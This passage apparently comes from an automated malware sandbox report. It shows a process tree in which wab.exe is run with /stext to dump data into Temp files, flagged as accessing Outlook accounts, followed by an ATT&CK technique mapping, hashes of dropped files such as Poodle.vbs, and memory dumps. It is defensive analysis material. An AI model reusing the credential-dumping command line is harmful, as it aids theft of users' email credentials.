                    5⤵
                      PID:3620
                    • C:\Program Files (x86)\windows mail\wab.exe
                      "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\haaqnalptigzrjavjswrf"
                      5⤵
                      • Suspicious behavior: EnumeratesProcesses
                      PID:1488
                    • C:\Program Files (x86)\windows mail\wab.exe
                      "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\scginswqhqymupozsdjlqyrwv"
                      5⤵
                      • Accesses Microsoft Outlook accounts
                      PID:1536
                    • C:\Program Files (x86)\windows mail\wab.exe
                      "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\cwltokgkvyqredcdkodmtclnwdny"
                      5⤵
                      • Suspicious use of AdjustPrivilegeToken
                      PID:4640

            Network

            MITRE ATT&CK Matrix ATT&CK v13

            Initial Access

            Execution

            Persistence

            Boot or Logon Autostart Execution

            1
            T1547

            Registry Run Keys / Startup Folder

            1
            T1547.001

            Privilege Escalation

            Boot or Logon Autostart Execution

            1
            T1547

            Registry Run Keys / Startup Folder

            1
            T1547.001

            Defense Evasion

            Modify Registry

            2
            T1112

            Credential Access

            Discovery

            Query Registry

            1
            T1012

            System Information Discovery

            2
            T1082

            Lateral Movement

            Collection

            Email Collection

            1
            T1114

            Exfiltration

            Command and Control

            Impact

            Resource Development

            Reconnaissance

            Replay Monitor

            Loading Replay Monitor...

            Downloads

            • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\09B406FB8A13DE24E07EA97DC21FE315
              Filesize

              504B

              MD5

              77cf71b01b47cb5f92480b9ee88b04b6

              SHA1

              7c6b92c4314701ec86e1224367fa863e199f4848

              SHA256

              4d58f46936a39d9efccc68b3537a3374a576126f9392d7c3995e22f2daf9be64

              SHA512

              03ff6ba4fa39bbf2ddfb2745dc209fbbf92864198a0f46ac691e200e8665bf3db17f3269fceffb5248e0afde8a6d0baa98ba2a882d4d185c10063d977308fe98

              Download Submit
            • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751
              Filesize

              717B

              MD5

              822467b728b7a66b081c91795373789a

              SHA1

              d8f2f02e1eef62485a9feffd59ce837511749865

              SHA256

              af2343382b88335eea72251ad84949e244ff54b6995063e24459a7216e9576b9

              SHA512

              bacea07d92c32078ca6a0161549b4e18edab745dd44947e5f181d28cc24468e07769d6835816cdfb944fd3d0099bde5e21b48f4966824c5c16c1801712303eb6

              Download Submit
            • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\09B406FB8A13DE24E07EA97DC21FE315
              Filesize

              546B

              MD5

              435124a16ee79fe2a2fa528f9aaae353

              SHA1

              010bb98ac96dc10e9725fff719c069f20cc4ad84

              SHA256

              b502947b432ffa4456f24772cf217a13f5fab0cb605509a7af8cc57199cd2322

              SHA512

              44588834e84b4b739ef1f7aa78807da6b3f83458c1a70970fbbd4a0f21c86061b7ca91303685b30f78108308f3c08b19f7091aa1b0f7439d44174057c6f5e49c

              Download Submit
            • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751
              Filesize

              192B

              MD5

              baf5dc11252401265a9ff096dbaad4fa

              SHA1

              7c7fab62e7529c4e09b589a069601757a17324f4

              SHA256

              284bcfd29a0aa8e946cd94c72e6bad081a9218ab4e22548ff0b82ad03ea0847a

              SHA512

              c196f09fb61179e6b8dab5ba650cb1a0a12854039a95dfe73843d420561a97621f46468b14c96098d7d69cb7bf9fc69c7da99a6f2c93a8384dcb4bce49dccb08

              Download Submit
            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
              Filesize

              53KB

              MD5

              d4d8cef58818612769a698c291ca3b37

              SHA1

              54e0a6e0c08723157829cea009ec4fe30bea5c50

              SHA256

              98fd693b92a71e24110ce7d018a117757ffdfe0e551a33c5fa5d8888a2d74fb0

              SHA512

              f165b1dde8f251e95d137a466d9bb77240396e289d1b2f8f1e9a28a6470545df07d00da6449250a1a0d73364c9cb6c00fd6229a385585a734da1ac65ac7e57f6

              Download Submit
            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
              Filesize

              1KB

              MD5

              d4ff23c124ae23955d34ae2a7306099a

              SHA1

              b814e3331a09a27acfcd114d0c8fcb07957940a3

              SHA256

              1de6cfd5e02c052e3475d33793b6a150b2dd6eebbf0aa3e4c8e4e2394a240a87

              SHA512

              f447a6042714ae99571014af14bca9d87ede59af68a0fa1d880019e9f1aa41af8cbf9c08b0fea2ccb7caa48165a75825187996ea6939ee8370afa33c9f809e79

              Download Submit
            • C:\Users\Admin\AppData\Local\Temp\Poodle.vbs
              Filesize

              187KB

              MD5

              8cc6be5a2911ea3dc1a05c80e20ede55

              SHA1

              5a68267614fc4f21b949dc82def16adb1a2a7178

              SHA256

              7dfd8c4c8c675118ad9020c10d439d7037b6d9e8a37482f80ae821fed5b29824

              SHA512

              cc57268ceca2b9911b1672d18692dca2bfcb65052c8b945614f766e66ed849bf8f14aa9076f7478026144f89995c1552ac596153bde157349bcca880094a264a

              Download Submit
            • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_2g5n2svp.yxg.ps1
              Filesize

              60B

              MD5

              d17fe0a3f47be24a6453e9ef58c94641

              SHA1

              6ab83620379fc69f80c0242105ddffd7d98d5d9d

              SHA256

              96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

              SHA512

              5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

              Download Submit
            • C:\Users\Admin\AppData\Local\Temp\haaqnalptigzrjavjswrf
              Filesize

              4KB

              MD5

              f5f89648b5d7536bb36bd19cff1de536

              SHA1

              0d3c67495fcf6cc33309290dfc2850a1bf3ce4be

              SHA256

              6480ae6b5690c82540ec16e2d7612cf5bc7cd2ecb409f68058705b99c8013817

              SHA512

              fc99c4ef2d3c88204272d7c660343d1dd3e6998eb670296bc3e1a41d39eec175a54cdc33a015c9fe22b2e9b39e8c1e7df6c4f5ae303e68f718e769396cb8fa5d

              Download Submit
            • C:\Users\Admin\AppData\Roaming\Gleir.Und
              Filesize

              496KB

              MD5

              668f9a675a74efad8e03ec3f59d91054

              SHA1

              58714abce023cfce5831c0bd753dfed9a29efa8d

              SHA256

              469421725844762d51ecb023ad25bfe29319c77a1c1cdec4710d03a2da78ad59

              SHA512

              ef830da73695d3f3de4eed65ef3ebb7b40458ece4ca0a020c99970cacab8b3a5735696bfe13ba5b13efbfeb6b6082210abfbfcbd6b8dea716cd85ebe443313a4

              Download Submit
            • C:\Users\Admin\AppData\Roaming\belemnoidea.Fos
              Filesize

              519KB

              MD5

              9cc29e9c2f524984e4ea412888fad3ab

              SHA1

              a3d9571861e7f334d70d82eb0c46e10f5427358e

              SHA256

              6b8159ea57129f319affa7fa8ca8a74bb1e59894e7c269675df3f65b3c5e3887

              SHA512

              d5761c80074c464327e346f2c89daed8de0691cc7d60140648f94c3d45232c035cebde895234118480abf6cdad4e187fcfb5fdd393aace83a52df62b4a493396

              Download Submit
            • memory/636-114-0x0000000000E40000-0x0000000006985000-memory.dmp
              Filesize

              91.3MB

              Download
            • memory/636-125-0x0000000000E40000-0x0000000006985000-memory.dmp
              Filesize

              91.3MB

              Download
            • memory/1080-107-0x00000000085D0000-0x000000000E115000-memory.dmp
              Filesize

              91.3MB

              Download
            • memory/1488-64-0x0000000000400000-0x0000000000478000-memory.dmp
              Filesize

              480KB

              Download
            • memory/1488-62-0x0000000000400000-0x0000000000478000-memory.dmp
              Filesize

              480KB

              Download
            • memory/1488-67-0x0000000000400000-0x0000000000478000-memory.dmp
              Filesize

              480KB

              Download
            • memory/1512-0-0x00007FFB64CD3000-0x00007FFB64CD5000-memory.dmp
              Filesize

              8KB

              Download
            • memory/1512-11-0x00007FFB64CD0000-0x00007FFB65791000-memory.dmp
              Filesize

              10.8MB

              Download
            • memory/1512-39-0x00007FFB64CD0000-0x00007FFB65791000-memory.dmp
              Filesize

              10.8MB

              Download
            • memory/1512-40-0x00007FFB64CD3000-0x00007FFB64CD5000-memory.dmp
              Filesize

              8KB

              Download
            • memory/1512-12-0x00007FFB64CD0000-0x00007FFB65791000-memory.dmp
              Filesize

              10.8MB

              Download
            • memory/1512-51-0x00007FFB64CD0000-0x00007FFB65791000-memory.dmp
              Filesize

              10.8MB

              Download
            • memory/1512-10-0x0000026AE8C80000-0x0000026AE8CA2000-memory.dmp
              Filesize

              136KB

              Download
            • memory/1536-63-0x0000000000400000-0x0000000000462000-memory.dmp
              Filesize

              392KB

              Download
            • memory/1536-66-0x0000000000400000-0x0000000000462000-memory.dmp
              Filesize

              392KB

              Download
            • memory/1536-65-0x0000000000400000-0x0000000000462000-memory.dmp
              Filesize

              392KB

              Download
            • memory/3536-92-0x000000001EDF0000-0x000000001EE09000-memory.dmp
              Filesize

              100KB

              Download
            • memory/3536-91-0x000000001EDF0000-0x000000001EE09000-memory.dmp
              Filesize

              100KB

              Download
            • memory/3536-88-0x000000001EDF0000-0x000000001EE09000-memory.dmp
              Filesize

              100KB

              Download
            • memory/3536-48-0x0000000001D00000-0x0000000002DC1000-memory.dmp
              Filesize

              16.8MB

              Download
            • memory/4596-36-0x0000000008D90000-0x0000000009334000-memory.dmp
              Filesize

              5.6MB

              Download
            • memory/4596-29-0x0000000006480000-0x00000000067D4000-memory.dmp
              Filesize

              3.3MB

              Download
            • memory/4596-15-0x0000000003000000-0x0000000003036000-memory.dmp
              Filesize

              216KB

              Download
            • memory/4596-16-0x0000000005A60000-0x0000000006088000-memory.dmp
              Filesize

              6.2MB

              Download
            • memory/4596-35-0x0000000007B70000-0x0000000007B92000-memory.dmp
              Filesize

              136KB

              Download
            • memory/4596-17-0x00000000060C0000-0x00000000060E2000-memory.dmp
              Filesize

              136KB

              Download
            • memory/4596-34-0x0000000007BE0000-0x0000000007C76000-memory.dmp
              Filesize

              600KB

              Download
            • memory/4596-19-0x00000000062D0000-0x0000000006336000-memory.dmp
              Filesize

              408KB

              Download
            • memory/4596-18-0x0000000006260000-0x00000000062C6000-memory.dmp
              Filesize

              408KB

              Download
            • memory/4596-33-0x0000000006EB0000-0x0000000006ECA000-memory.dmp
              Filesize

              104KB

              Download
            • memory/4596-32-0x0000000008160000-0x00000000087DA000-memory.dmp
              Filesize

              6.5MB

              Download
            • memory/4596-31-0x0000000006950000-0x000000000699C000-memory.dmp
              Filesize

              304KB

              Download
            • memory/4596-30-0x0000000006910000-0x000000000692E000-memory.dmp
              Filesize

              120KB

              Download
            • memory/4596-38-0x0000000009340000-0x000000000A401000-memory.dmp
              Filesize

              16.8MB

              Download
            • memory/4640-70-0x0000000000400000-0x0000000000424000-memory.dmp
              Filesize

              144KB

              Download
            • memory/4640-69-0x0000000000400000-0x0000000000424000-memory.dmp
              Filesize

              144KB

              Download
            • memory/4640-68-0x0000000000400000-0x0000000000424000-memory.dmp
              Filesize

              144KB

              Download
            • memory/4824-86-0x0000000005CA0000-0x0000000005CEC000-memory.dmp
              Filesize

              304KB

              Download
            • memory/4824-83-0x00000000054E0000-0x0000000005834000-memory.dmp
              Filesize

              3.3MB

              Download